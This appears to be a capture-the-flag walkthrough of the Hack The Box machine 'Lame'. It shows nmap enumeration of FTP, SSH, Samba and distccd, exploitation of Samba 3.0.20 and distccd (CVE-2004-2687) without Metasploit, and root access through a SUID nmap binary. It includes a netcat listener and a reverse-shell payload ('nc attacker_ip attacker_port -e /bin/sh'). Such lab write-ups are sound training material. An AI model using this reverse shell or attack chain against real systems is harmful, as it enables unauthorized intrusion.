In this walkthrough, we’re going to explore two ways to root Lame without metasploit. If you are ready let's dive in. We would start with an nmap scan as usual: nmap -p- 10.129.22.59 Starting Nmap 7.94SVN ( https://nmap.org ) at 2026-04-20 15:30 CDT Nmap scan report for 10.129.22.59 Host is up (0.070s latency). Not shown: 65530 filtered tcp ports (no-response) PORT STATE SERVICE 21/tcp open ftp 22/tcp open ssh 139/tcp open netbios-ssn 445/tcp open microsoft-ds 3632/tcp open distccd I usually check all port first, then check each services individually. We would follow the same flow here. We got ftp, ssh, smb and distccd, let's look into these services one at a time: nmap -A -p21 10.129.22.59 Starting Nmap 7.94SVN ( https://nmap.org ) at 2026-04-20 15:34 CDT Nmap scan report for 10.129.22.59 Host is up (0.071s latency). PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 2.3.4 |_ftp-anon: Anonymous FTP login allowed (FTP code 230) | ftp-syst: | STAT: | FTP server status: | Connected to 10.10.15.162 | Logged in as ftp | TYPE: ASCII | No session bandwidth limit | Session timeout in seconds is 300 | Control connection is plain text | Data connections will be plain text | vsFTPd 2.3.4 - secure, fast, stable |_End of status Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Aggressive OS guesses: Linux 2.6.23 (92%), DD-WRT v24-sp1 (Linux 2.4.36) (90%), Arris TG862G/CT cable modem (90%), Control4 HC-300 home controller (90%), D-Link DAP-1522 WAP, or Xerox WorkCentre Pro 245 or 6556 printer (90%), Dell Integrated Remote Access Controller (iDRAC6) (90%), Linksys WET54GS5 WAP, Tranzeo TR-CPQ-19f WAP, or Xerox WorkCentre Pro 265 printer (90%), Linux 2.4.21 - 2.4.31 (likely embedded) (90%), Linux 2.4.27 (90%), Linux 2.4.7 (90%) No exact OS matches for host (test conditions non-ideal). Network Distance: 2 hops Service Info: OS: Unix TRACEROUTE (using port 21/tcp) HOP RTT ADDRESS 1 70.36 ms 10.10.14.1 2 70.76 ms 10.129.22.59 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 10.36 seconds From our scan Anonymous FTP login allowed (FTP code 230), this sounds good. Let's try to login, we are able to login but nothing serious in there ftp 10.129.22.59 Connected to 10.129.22.59. 220 (vsFTPd 2.3.4) Name (10.129.22.59:root): anonymous 331 Please specify the password. Password: 230 Login successful. Remote system type is UNIX. Using binary mode to transfer files. ftp> ls 229 Entering Extended Passive Mode (|||53820|). 150 Here comes the directory listing. 226 Directory send OK. But when we check the version of the ftp, vsftpd 2.3.4 VSFTPD 2.3.4 Backdoor Command Execution. But because we do not want to use metasploit, let's check other services. nmap -A -p22 10.129.22.59 Starting Nmap 7.94SVN ( https://nmap.org ) at 2026-04-20 15:39 CDT Nmap scan report for 10.129.22.59 Host is up (0.071s latency). PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0) | ssh-hostkey: | 1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA) |_ 2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA) Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Aggressive OS guesses: Linux 2.6.23 (91%), DD-WRT v24-sp1 (Linux 2.4.36) (90%), Arris TG862G/CT cable modem (90%), Dell Integrated Remote Access Controller (iDRAC6) (90%), Linksys WET54GS5 WAP, Tranzeo TR-CPQ-19f WAP, or Xerox WorkCentre Pro 265 printer (90%), Linux 2.4.21 - 2.4.31 (likely embedded) (90%), Linux 2.4.27 (90%), Linux 2.4.7 (90%), Linux 2.6.27 - 2.6.28 (90%), Linux 2.6.8 - 2.6.30 (90%) No exact OS matches for host (test conditions non-ideal). Network Distance: 2 hops Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel TRACEROUTE (using port 22/tcp) HOP RTT ADDRESS 1 70.14 ms 10.10.14.1 2 70.53 ms 10.129.22.59 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 9.82 seconds It seems nothing is in ssh Let's move to smb, for the smb we are going to combine the 339/445 nmap -A -p139,445 10.129.22.59 Starting Nmap 7.94SVN ( https://nmap.org ) at 2026-04-20 15:42 CDT Nmap scan report for 10.129.22.59 Host is up (0.071s latency). PORT STATE SERVICE VERSION 139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP) 445/tcp open netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP) Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Aggressive OS guesses: Linux 2.6.23 (92%), Belkin N300 WAP (Linux 2.6.30) (90%), D-Link DAP-1522 WAP, or Xerox WorkCentre Pro 245 or 6556 printer (90%), Dell Integrated Remote Access Controller (iDRAC5) (90%), Linux 2.4.21 - 2.4.31 (likely embedded) (90%), Linux 2.4.7 (90%), Linux 2.6.18 (ClarkConnect 4.3 Enterprise Edition) (90%), Linux 2.6.8 - 2.6.30 (90%), Dell iDRAC 6 remote access controller (Linux 2.6) (90%), Linksys WRV54G WAP (89%) No exact OS matches for host (test conditions non-ideal). Network Distance: 2 hops Host script results: | smb-os-discovery: | OS: Unix (Samba 3.0.20-Debian) | Computer name: lame | NetBIOS computer name: | Domain name: hackthebox.gr | FQDN: lame.hackthebox.gr |_ System time: 2026-04-20T16:43:38-04:00 |_clock-skew: mean: 2h00m39s, deviation: 2h49m44s, median: 37s |_smb2-time: Protocol negotiation failed (SMB2) | smb-security-mode: | account_used: guest | authentication_level: user | challenge_response: supported |_ message_signing: disabled (dangerous, but default) TRACEROUTE (using port 139/tcp) HOP RTT ADDRESS 1 70.41 ms 10.10.14.1 2 70.59 ms 10.129.22.59 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 55.91 seconds The smb/samba version discovered: smbd 3.0.20-Debian. Let's try to access the shares with smbclient: smbclient //10.129.22.59/anonymous Password for [WORKGROUP\iamdayone]: Anonymous login successful tree connect failed: NT_STATUS_BAD_NETWORK_NAME It shows Anonymous login successful, let's try to list the shares: smbclient -L \\\\10.129.22.59\\ Password for [WORKGROUP\iamdayone]: Anonymous login successful Sharename Type Comment --------- ---- ------- print$ Disk Printer Drivers tmp Disk oh noes! opt Disk IPC$ IPC IPC Service (lame server (Samba 3.0.20-Debian)) ADMIN$ IPC IPC Service (lame server (Samba 3.0.20-Debian)) Reconnecting with SMB1 for workgroup listing. Anonymous login successful Server Comment --------- ------- Workgroup Master --------- ------- WORKGROUP LAME I was able to list the share, but I was unable to access any of the shares. Now let's check the version on google for any know vulnerability, We found out that the samba version 3.0.20 is vulnerable to: username map script and because I do not want to use metasploit, I use the exploit here With the exploit we got root shell, now need for privilege escalation: Remember that we still one more service left, let's try to see if we can compromise that as well without metasploit, why not: nmap -A -p3632 10.129.22.59 Starting Nmap 7.94SVN ( https://nmap.org ) at 2026-04-20 15:45 CDT Nmap scan report for 10.129.22.59 Host is up (0.071s latency). PORT STATE SERVICE VERSION 3632/tcp open distccd distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4)) Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Aggressive OS guesses: Linux 2.6.23 (92%), Belkin N300 WAP (Linux 2.6.30) (90%), Control4 HC-300 home controller (90%), Dell Integrated Remote Access Controller (iDRAC5) (90%), Dell Integrated Remote Access Controller (iDRAC6) (90%), Linksys WET54GS5 WAP, Tranzeo TR-CPQ-19f WAP, or Xerox WorkCentre Pro 265 printer (90%), Linux 2.4.21 - 2.4.31 (likely embedded) (90%), Linux 2.4.7 (90%), Citrix XenServer 5.5 (Linux 2.6.18) (90%), Linux 2.6.18 (ClarkConnect 4.3 Enterprise Edition) (90%) No exact OS matches for host (test conditions non-ideal). Network Distance: 2 hops TRACEROUTE (using port 3632/tcp) HOP RTT ADDRESS 1 70.75 ms 10.10.14.1 2 71.01 ms 10.129.22.59 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 15.90 seconds The service version running is: distccd v1, let's check if this is vulnerable. After some googling, we discovered that this version is vulnerable to: distccd v1 RCE (CVE-2004-2687). Remeber, we do not want to use metasploit. After several search, I found this exploit, which wouldn't work: exploit I upgraded the exploit code to python3 to see if it would work, upgraded exploit here Once you have exploit ready, start ncat listerner on your local machine: nc -lvnp attacker_port Then run the exploit with the command below: python3 exploit.py -t target_ip -p target_port -c "nc attacker_ip attacker_port -e /bin/sh" I pop a shell: If you noticed, with this shell, unlike the samba shell, we are not root. Therefore, we need to escalate our privilege. First, let's check SUID to see if there are binaries we can ride on to become root: find / -perm -u=s -type f 2>/dev/null find / -perm -u=s -type f 2>/dev/null /bin/umount /bin/fusermount /bin/su /bin/mount /bin/ping /bin/ping6 /sbin/mount.nfs /lib/dhcp3-client/call-dhclient-script /usr/bin/sudoedit /usr/bin/X /usr/bin/netkit-rsh /usr/bin/gpasswd /usr/bin/traceroute6.iputils /usr/bin/sudo /usr/bin/netkit-rlogin /usr/bin/arping /usr/bin/at /usr/bin/newgrp /usr/bin/chfn /usr/bin/nmap /usr/bin/chsh /usr/bin/netkit-rcp /usr/bin/passwd /usr/bin/mtr /usr/sbin/uuidd /usr/sbin/pppd /usr/lib/telnetlogin /usr/lib/apache2/suexec /usr/lib/eject/dmcrypt-get-device /usr/lib/openssh/ssh-keysign /usr/lib/pt_chown /usr/lib/vmware-tools/bin64/vmware-user-suid-wrapper /usr/lib/vmware-tools/bin32/vmware-user-suid-wrapper From output above /usr/bin/nmap looks juicy. Let's check GTFBINS: We found nmap and command to run on GTFBINs, what are we waiting for? Let's run the command: We are root! This machine reinforced the importance of approaching exploitation from multiple angles. While distccd (CVE-2004-2687) provided a straightforward remote code execution path, exploring the Samba service revealed an alternative route to compromise. This highlights that real-world targets often have more than one viable attack vector. Avoiding automated tools like Metasploit forced a deeper understanding of the underlying vulnerabilities. Rewriting the exploits improved my ability to analyze exploit logic, adapt payloads, and troubleshoot issues when things didn’t work as expected. Another key takeaway is the critical role of thorough enumeration. Identifying outdated and vulnerable services early on made exploitation significantly easier. This emphasizes that enumeration is often the most important phase of a penetration test. Finally, this machine demonstrates how legacy services such as distccd and Samba can pose serious security risks when left unpatched, reinforcing the importance of proper system hardening and regular updates.